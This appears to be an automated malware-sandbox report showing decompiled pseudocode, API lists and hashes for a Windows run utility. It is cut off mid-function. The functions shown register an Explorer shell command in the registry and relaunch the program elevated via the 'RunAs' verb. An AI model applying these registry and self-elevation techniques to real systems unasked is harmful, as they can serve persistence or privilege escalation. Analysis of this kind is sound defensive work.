                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                                                          • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                                                                                                                          • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                                                          			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				char _v516;
                                                                                                                                                                                                                          				void _v1026;
                                                                                                                                                                                                                          				long _v1028;
                                                                                                                                                                                                                          				void _v1538;
                                                                                                                                                                                                                          				char _v1540;
                                                                                                                                                                                                                          				void _v2050;
                                                                                                                                                                                                                          				char _v2052;
                                                                                                                                                                                                                          				char _v2564;
                                                                                                                                                                                                                          				char _v35332;
                                                                                                                                                                                                                          				char _t51;
                                                                                                                                                                                                                          				intOrPtr* _t54;
                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                          				intOrPtr* _t73;
                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x8a00, __ecx);
                                                                                                                                                                                                                          				_v2052 = 0;
                                                                                                                                                                                                                          				memset( &_v2050, 0, 0x1fc);
                                                                                                                                                                                                                          				_v1540 = 0;
                                                                                                                                                                                                                          				memset( &_v1538, 0, 0x1fc);
                                                                                                                                                                                                                          				_v1028 = 0;
                                                                                                                                                                                                                          				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                                                                                          				_t79 = _t78 + 0x24;
                                                                                                                                                                                                                          				if(_a20 != 0xffffffff) {
                                                                                                                                                                                                                          					_push(E0040ADC0(_a20,  &_v2564));
                                                                                                                                                                                                                          					_push(L" bgcolor=\"%s\"");
                                                                                                                                                                                                                          					_push(0xff);
                                                                                                                                                                                                                          					_push( &_v2052);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t79 = _t79 + 0x18;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_a24 != 0xffffffff) {
                                                                                                                                                                                                                          					_push(E0040ADC0(_a24,  &_v2564));
                                                                                                                                                                                                                          					_push(L"<font color=\"%s\">");
                                                                                                                                                                                                                          					_push(0xff);
                                                                                                                                                                                                                          					_push( &_v1540);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					wcscpy( &_v1028, L"</font>");
                                                                                                                                                                                                                          					_t79 = _t79 + 0x20;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push( &_v2052);
                                                                                                                                                                                                                          				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                                                                                                                                                          				_push(0x3fff);
                                                                                                                                                                                                                          				_push( &_v35332);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				_t80 = _t79 + 0x10;
                                                                                                                                                                                                                          				E00407343(_a4, _a8,  &_v35332);
                                                                                                                                                                                                                          				_t51 = _a16;
                                                                                                                                                                                                                          				if(_t51 > 0) {
                                                                                                                                                                                                                          					_t73 = _a12 + 4;
                                                                                                                                                                                                                          					_a20 = _t51;
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_v516 = 0;
                                                                                                                                                                                                                          						memset( &_v514, 0, 0x1fc);
                                                                                                                                                                                                                          						_t54 =  *_t73;
                                                                                                                                                                                                                          						_t81 = _t80 + 0xc;
                                                                                                                                                                                                                          						if( *_t54 == 0) {
                                                                                                                                                                                                                          							_v516 = 0;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_push(_t54);
                                                                                                                                                                                                                          							_push(L" width=\"%s\"");
                                                                                                                                                                                                                          							_push(0xff);
                                                                                                                                                                                                                          							_push( &_v516);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							_t81 = _t81 + 0x10;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_push( &_v1028);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                                                                                                                                                          						_push( &_v1540);
                                                                                                                                                                                                                          						_push( &_v516);
                                                                                                                                                                                                                          						_push(L"<th%s>%s%s%s\r\n");
                                                                                                                                                                                                                          						_push(0x3fff);
                                                                                                                                                                                                                          						_push( &_v35332);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t80 = _t81 + 0x1c;
                                                                                                                                                                                                                          						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                                                                                                                                                                          						_t73 = _t73 + 8;
                                                                                                                                                                                                                          						_t36 =  &_a20;
                                                                                                                                                                                                                          						 *_t36 = _a20 - 1;
                                                                                                                                                                                                                          					} while ( *_t36 != 0);
                                                                                                                                                                                                                          					return _t61;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t51;
                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                          0x00407c0b
                                                                                                                                                                                                                          0x00407c1c
                                                                                                                                                                                                                          0x00407c21
                                                                                                                                                                                                                          0x00407c21
                                                                                                                                                                                                                          0x00407c2a
                                                                                                                                                                                                                          0x00407c2b
                                                                                                                                                                                                                          0x00407c36
                                                                                                                                                                                                                          0x00407c3b
                                                                                                                                                                                                                          0x00407c3c
                                                                                                                                                                                                                          0x00407c41
                                                                                                                                                                                                                          0x00407c51
                                                                                                                                                                                                                          0x00407c56
                                                                                                                                                                                                                          0x00407c5b
                                                                                                                                                                                                                          0x00407c65
                                                                                                                                                                                                                          0x00407c68
                                                                                                                                                                                                                          0x00407c6b
                                                                                                                                                                                                                          0x00407c74
                                                                                                                                                                                                                          0x00407c7b
                                                                                                                                                                                                                          0x00407c80
                                                                                                                                                                                                                          0x00407c82
                                                                                                                                                                                                                          0x00407c88
                                                                                                                                                                                                                          0x00407ca6
                                                                                                                                                                                                                          0x00407c8a
                                                                                                                                                                                                                          0x00407c8a
                                                                                                                                                                                                                          0x00407c8b
                                                                                                                                                                                                                          0x00407c96
                                                                                                                                                                                                                          0x00407c9b
                                                                                                                                                                                                                          0x00407c9c
                                                                                                                                                                                                                          0x00407ca1
                                                                                                                                                                                                                          0x00407ca1
                                                                                                                                                                                                                          0x00407cb3
                                                                                                                                                                                                                          0x00407cb4
                                                                                                                                                                                                                          0x00407cbd
                                                                                                                                                                                                                          0x00407cc4
                                                                                                                                                                                                                          0x00407cc5
                                                                                                                                                                                                                          0x00407cd0
                                                                                                                                                                                                                          0x00407cd5
                                                                                                                                                                                                                          0x00407cd6
                                                                                                                                                                                                                          0x00407cdb
                                                                                                                                                                                                                          0x00407ceb
                                                                                                                                                                                                                          0x00407cf0
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00407cfc
                                                                                                                                                                                                                          0x00407d00

Memory Dump Source
• Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
• Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
• Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
• Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
• Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                          			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				short _v32;
                                                                                                                                                                                                                          				void _v2078;
                                                                                                                                                                                                                          				signed int _v2080;
                                                                                                                                                                                                                          				void _v4126;
                                                                                                                                                                                                                          				char _v4128;
                                                                                                                                                                                                                          				void _v6174;
                                                                                                                                                                                                                          				char _v6176;
                                                                                                                                                                                                                          				void _v8222;
                                                                                                                                                                                                                          				char _v8224;
                                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                                          				short _t55;
                                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                                          				int _t73;
                                                                                                                                                                                                                          				intOrPtr _t78;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t76 = __ecx;
                                                                                                                                                                                                                          				E0040B550(0x201c, __ecx);
                                                                                                                                                                                                                          				_t73 = 0;
                                                                                                                                                                                                                          				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                          					return _t73;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v6176 = 0;
                                                                                                                                                                                                                          				memset( &_v6174, 0, 0x7fe);
                                                                                                                                                                                                                          				_t78 = _a4;
                                                                                                                                                                                                                          				_push(_t78 + 0x20a);
                                                                                                                                                                                                                          				_push(_t78);
                                                                                                                                                                                                                          				_push(L"%s\\shell\\%s\\command");
                                                                                                                                                                                                                          				_push(0x3ff);
                                                                                                                                                                                                                          				_push( &_v6176);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                                                                                                                                                                          					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                                                                                                                                                                          					asm("sbb ebx, ebx");
                                                                                                                                                                                                                          					_t73 =  ~_t49 + 1;
                                                                                                                                                                                                                          					RegCloseKey(_v12);
                                                                                                                                                                                                                          					_v2080 = _v2080 & 0x00000000;
                                                                                                                                                                                                                          					memset( &_v2078, 0, 0x7fe);
                                                                                                                                                                                                                          					E00404AD9( &_v2080);
                                                                                                                                                                                                                          					if(_v2078 == 0x3a) {
                                                                                                                                                                                                                          						_t55 =  *L"C:\\"; // 0x3a0043
                                                                                                                                                                                                                          						_v32 = _t55;
                                                                                                                                                                                                                          						_t56 =  *0x40ccdc; // 0x5c
                                                                                                                                                                                                                          						_v28 = _t56;
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						_v32 = _v2080;
                                                                                                                                                                                                                          						if(GetDriveTypeW( &_v32) == 3) {
                                                                                                                                                                                                                          							_v4128 = 0;
                                                                                                                                                                                                                          							memset( &_v4126, 0, 0x7fe);
                                                                                                                                                                                                                          							_v8224 = 0;
                                                                                                                                                                                                                          							memset( &_v8222, 0, 0x7fe);
                                                                                                                                                                                                                          							_push(_a4 + 0x20a);
                                                                                                                                                                                                                          							_push(_a4);
                                                                                                                                                                                                                          							_push(L"%s\\shell\\%s");
                                                                                                                                                                                                                          							_push(0x3ff);
                                                                                                                                                                                                                          							_push( &_v8224);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							_push( &_v2080);
                                                                                                                                                                                                                          							_push(L"\"%s\",0");
                                                                                                                                                                                                                          							_push(0x3ff);
                                                                                                                                                                                                                          							_push( &_v4128);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				RegCloseKey(_v8);
                                                                                                                                                                                                                          				goto L6;
                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404452
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404473
                                                                                                                                                                                                                            • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                                                                                                                            • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                                                                                                                            • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004044CF
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404539
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040454E
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404571
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                                                                                                                            • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                                                                                                                          • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                                                                                                                          • API String ID: 486436031-734527199
                                                                                                                                                                                                                          • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                                                                          • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                          			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
                                                                                                                                                                                                                          				void _v530;
                                                                                                                                                                                                                          				char _v532;
                                                                                                                                                                                                                          				void _v1042;
                                                                                                                                                                                                                          				long _v1044;
                                                                                                                                                                                                                          				long _v4116;
                                                                                                                                                                                                                          				char _v5164;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x142c, __ecx);
                                                                                                                                                                                                                          				_v1044 = 0;
                                                                                                                                                                                                                          				memset( &_v1042, 0, 0x1fc);
                                                                                                                                                                                                                          				_v532 = 0;
                                                                                                                                                                                                                          				memset( &_v530, 0, 0x208);
                                                                                                                                                                                                                          				E00404AD9( &_v532);
                                                                                                                                                                                                                          				_pop(_t44);
                                                                                                                                                                                                                          				E00405AA7( &_v5164);
                                                                                                                                                                                                                          				_t27 = E0040B04D( &_v5164,  &_v532);
                                                                                                                                                                                                                          				_t61 = _t27;
                                                                                                                                                                                                                          				if(_t27 != 0) {
                                                                                                                                                                                                                          					wcscpy( &_v1044,  &_v4116);
                                                                                                                                                                                                                          					_pop(_t44);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				wcscpy(0x40fb90, _a8);
                                                                                                                                                                                                                          				wcscpy(0x40fda0, L"general");
                                                                                                                                                                                                                          				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
                                                                                                                                                                                                                          				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                                                                                                                                                                          				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                                                                                                                                                                          				E00405FAC(_t61, L"RTL", "0", 0);
                                                                                                                                                                                                                          				EnumResourceNamesW(_a4, 4, E0040620E, 0);
                                                                                                                                                                                                                          				EnumResourceNamesW(_a4, 5, E0040620E, 0);
                                                                                                                                                                                                                          				wcscpy(0x40fda0, L"strings");
                                                                                                                                                                                                                          				_t38 = E00406337(_t44, _t61, _a4);
                                                                                                                                                                                                                          				 *0x40fb90 =  *0x40fb90 & 0x00000000;
                                                                                                                                                                                                                          				return _t38;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406484
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004064A0
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004064E4
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004064F3
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00406503
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040657A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                                                                                          • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                          • API String ID: 3037099051-2314623505
                                                                                                                                                                                                                          • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                                                                          • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00401C26(long _a4) {
                                                                                                                                                                                                                          				struct _SHELLEXECUTEINFOW _v68;
                                                                                                                                                                                                                          				void _v582;
                                                                                                                                                                                                                          				char _v584;
                                                                                                                                                                                                                          				void _v1110;
                                                                                                                                                                                                                          				char _v1112;
                                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                                          				int _t36;
                                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                                          				long _t44;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t44 = 0;
                                                                                                                                                                                                                          				_t23 = GetCurrentProcessId();
                                                                                                                                                                                                                          				_v584 = 0;
                                                                                                                                                                                                                          				memset( &_v582, 0, 0x1fe);
                                                                                                                                                                                                                          				_v1112 = 0;
                                                                                                                                                                                                                          				memset( &_v1110, 0, 0x208);
                                                                                                                                                                                                                          				E00404AD9( &_v1112);
                                                                                                                                                                                                                          				_push(_t23);
                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                          				_push(_a4);
                                                                                                                                                                                                                          				_push(L"/SpecialRun %I64x %d");
                                                                                                                                                                                                                          				_push(0xff);
                                                                                                                                                                                                                          				_push( &_v584);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				memset( &(_v68.fMask), 0, 0x38);
                                                                                                                                                                                                                          				_v68.lpFile =  &_v1112;
                                                                                                                                                                                                                          				_v68.lpParameters =  &_v584;
                                                                                                                                                                                                                          				_v68.cbSize = 0x3c;
                                                                                                                                                                                                                          				_v68.lpVerb = L"RunAs";
                                                                                                                                                                                                                          				_v68.fMask = 0x40;
                                                                                                                                                                                                                          				_v68.nShow = 5;
                                                                                                                                                                                                                          				_t36 = ShellExecuteExW( &_v68);
                                                                                                                                                                                                                          				_t43 = _v68.hProcess;
                                                                                                                                                                                                                          				if(_t36 == 0) {
                                                                                                                                                                                                                          					_t44 = GetLastError();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					WaitForSingleObject(_t43, 0x5dc);
                                                                                                                                                                                                                          					_a4 = 0;
                                                                                                                                                                                                                          					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
                                                                                                                                                                                                                          						_t44 = _a4;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t44;
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C4F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C68
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C9B
                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                                                                                                                          • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                                                                                                                          • API String ID: 903100921-3385179869
                                                                                                                                                                                                                          • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                                                                          • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                                                          			E00409A94(long _a4, intOrPtr _a8) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                          				void _v315;
                                                                                                                                                                                                                          				char _v316;
                                                                                                                                                                                                                          				void _v826;
                                                                                                                                                                                                                          				char _v828;
                                                                                                                                                                                                                          				void _v1338;
                                                                                                                                                                                                                          				char _v1340;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t93;
                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                          				int _t106;
                                                                                                                                                                                                                          				void* _t108;
                                                                                                                                                                                                                          				void* _t110;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v828 = 0;
                                                                                                                                                                                                                          				memset( &_v826, 0, 0x1fe);
                                                                                                                                                                                                                          				_v1340 = 0;
                                                                                                                                                                                                                          				memset( &_v1338, 0, 0x1fe);
                                                                                                                                                                                                                          				_t110 = _t108 + 0x18;
                                                                                                                                                                                                                          				_t61 = OpenProcess(0x400, 0, _a4);
                                                                                                                                                                                                                          				_t113 = _t61;
                                                                                                                                                                                                                          				_v20 = _t61;
                                                                                                                                                                                                                          				if(_t61 == 0) {
                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                          					if(_v828 == 0) {
                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_push( &_v828);
                                                                                                                                                                                                                          					_push( &_v1340);
                                                                                                                                                                                                                          					_push(L"%s\\%s");
                                                                                                                                                                                                                          					_push(0xff);
